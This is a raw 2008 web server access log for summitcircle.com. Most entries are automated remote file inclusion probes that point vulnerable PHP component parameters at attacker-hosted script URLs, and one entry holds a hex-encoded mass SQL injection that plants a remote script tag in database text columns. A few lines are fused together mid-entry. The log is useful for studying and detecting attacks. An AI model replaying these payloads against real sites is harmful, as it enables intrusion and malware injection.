212.73.82.13 - - [17/Aug/2008:17:50:33 -0700] "GET /logs/access_071231.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:50:41 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:50:42 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:17:50:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:50:43 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:17:50:43 -0700] "GET //skin/zero_vote/error.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:50:45 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:50:56 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:51:35 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:51:35 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:51:35 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:51:39 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:51:39 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:51:40 -0700] "GET /logs/access_080210.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:51:59 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:52:05 -0700] "GET /logs/access_080406.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:52:05 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:52:05 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:52:09 -0700] "GET /logs/access_080428.log/index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:52:23 -0700] "GET /logs/access_080406.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:52:23 -0700] "GET /index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:52:34 -0700] "GET /logs/index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:53:20 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:53:20 -0700] "GET /logs/access_080406.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:53:20 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
219.94.128.213 - - [17/Aug/2008:17:54:21 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
219.94.128.213 - - [17/Aug/2008:17:54:21 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:54:22 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:54:22 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:54:27 -0700] "GET /logs/access_080406.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
80.67.24.2 - - [17/Aug/2008:17:54:36 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
80.67.24.2 - - [17/Aug/2008:17:54:46 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
80.67.24.2 - - [17/Aug/2008:17:54:54 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:55:18 -0700] "GET /index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:55:18 -0700] "GET /logs/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:55:18 -0700] "GET /logs/access.log%20/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:17:55:45 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:17:55:46 -0700] "GET /logs/access_080407.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:55:55 -0700] "GET /logs/access_080616.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:56:41 -0700] "GET /logs/access.log/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:57:16 -0700] "GET /logs/access_071217.log/index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:57:34 -0700] "GET /logs/access.log/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:57:34 -0700] "GET /logs/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:57:34 -0700] "GET /index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
88.87.205.164 - - [17/Aug/2008:17:57:37 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
88.87.205.164 - - [17/Aug/2008:17:57:37 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:57:39 -0700] "GET /logs/access_080505.log/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
88.87.205.164 - - [17/Aug/2008:17:57:58 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
88.87.205.164 - - [17/Aug/2008:17:57:58 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
200.115.241.201 - - [17/Aug/2008:17:58:15 -0700] "GET /logs/access_071022.log HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.summitcircle.com"
200.115.241.201 - - [17/Aug/2008:17:58:15 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.summitcircle.com"
12.173.2.239 - - [17/Aug/2008:17:58:28 -0700] "GET /logs/access_070910.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043socalcustoms/us2:76.171.12.173.2.239 - - [17/Aug/2008:17:58:28 -0700] "GET /logs/access_070910.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432globalphotographic/us1:1219.94.162.56 - - [17/Aug/2008:17:58:33 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.summitcircle.com"
219.94.162.56 - - [17/Aug/2008:17:58:33 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:58:52 -0700] "GET /logs/access_080427.log/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.20.229.11 - - [17/Aug/2008:17:59:21 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
213.20.229.11 - - [17/Aug/2008:17:59:24 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
213.20.229.11 - - [17/Aug/2008:17:59:24 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:17:59:24 -0700] "GET /logs/access_080616.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
58.227.193.215 - - [17/Aug/2008:18:00:11 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:18:00:45 -0700] "GET /logs/access_080616.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.211.146 - - [17/Aug/2008:18:00:48 -0700] "GET /logs/access_071217.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.115.241.201 - - [17/Aug/2008:18:00:57 -0700] "GET /logs/access_080421.log HTTP/1.0" 200 5308416 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:18:01:05 -0700] "GET /logs/access_080505.log/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
58.138.24.42 - - [17/Aug/2008:18:01:12 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
58.138.24.42 - - [17/Aug/2008:18:01:12 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
82.165.43.63 - - [17/Aug/2008:18:03:15 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.165.43.63 - - [17/Aug/2008:18:03:16 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.165.43.63 - - [17/Aug/2008:18:03:16 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:18:03:24 -0700] "GET /logs/access_080121.log//data/compatible.php?module_name=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:18:03:24 -0700] "GET //data/compatible.php?module_name=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:18:03:24 -0700] "GET /logs//data/compatible.php?module_name=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:18:03:27 -0700] "GET /logs/access.log%20/index.php?redir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:04:18 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/errors.php?error=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:04:18 -0700] "GET //modules/xt_conteudo/admin/spaw/errors.php?error=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:05:35 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:05:35 -0700] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:05:36 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [17/Aug/2008:18:05:36 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.52.99.98 - - [17/Aug/2008:18:05:49 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.165.43.63 - - [17/Aug/2008:18:06:31 -0700] "GET /logs/access_071231.log//components/com_forum/download.php?phpbb_root_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:07:18 -0700] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:18:07:58 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:18:08:23 -0700] "GET /logs//?path%5Bdocroot%5D=http://leqhi.com/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:18:08:23 -0700] "GET //?path%5Bdocroot%5D=http://leqhi.com/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:08:31 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:18:09:05 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:18:09:06 -0700] "GET //?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:18:10:16 -0700] "GET /logs/access_071111.log/index1.php?=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:18:13:31 -0700] "GET /logs/access_071217.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:17:56 -0700] "GET /logs/access_071111.log//modules/xt_conteudo/admin/spaw/errors.php?error=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:18:18:02 -0700] "GET /logs/access_080331.log//modules/xt_conteudo/admin/spaw/errors.php?error=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:18:18:21 -0700] "GET /logs/access_071203.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:18:18:27 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:18:20:10 -0700] "GET /logs/access_071203.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:18:20:23 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.89.233.48 - - [17/Aug/2008:18:21:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
80.89.233.48 - - [17/Aug/2008:18:21:06 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
200.171.245.29 - - [17/Aug/2008:18:21:08 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eskentx.kit.net/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.171.245.29 - - [17/Aug/2008:18:21:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://eskentx.kit.net/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.150.225.244 - - [17/Aug/2008:18:21:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
216.150.225.244 - - [17/Aug/2008:18:21:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
212.61.129.237 - - [17/Aug/2008:18:21:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
212.61.129.237 - - [17/Aug/2008:18:21:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
87.106.4.147 - - [17/Aug/2008:18:21:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
87.106.4.147 - - [17/Aug/2008:18:21:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
69.94.30.30 - - [17/Aug/2008:18:23:51 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
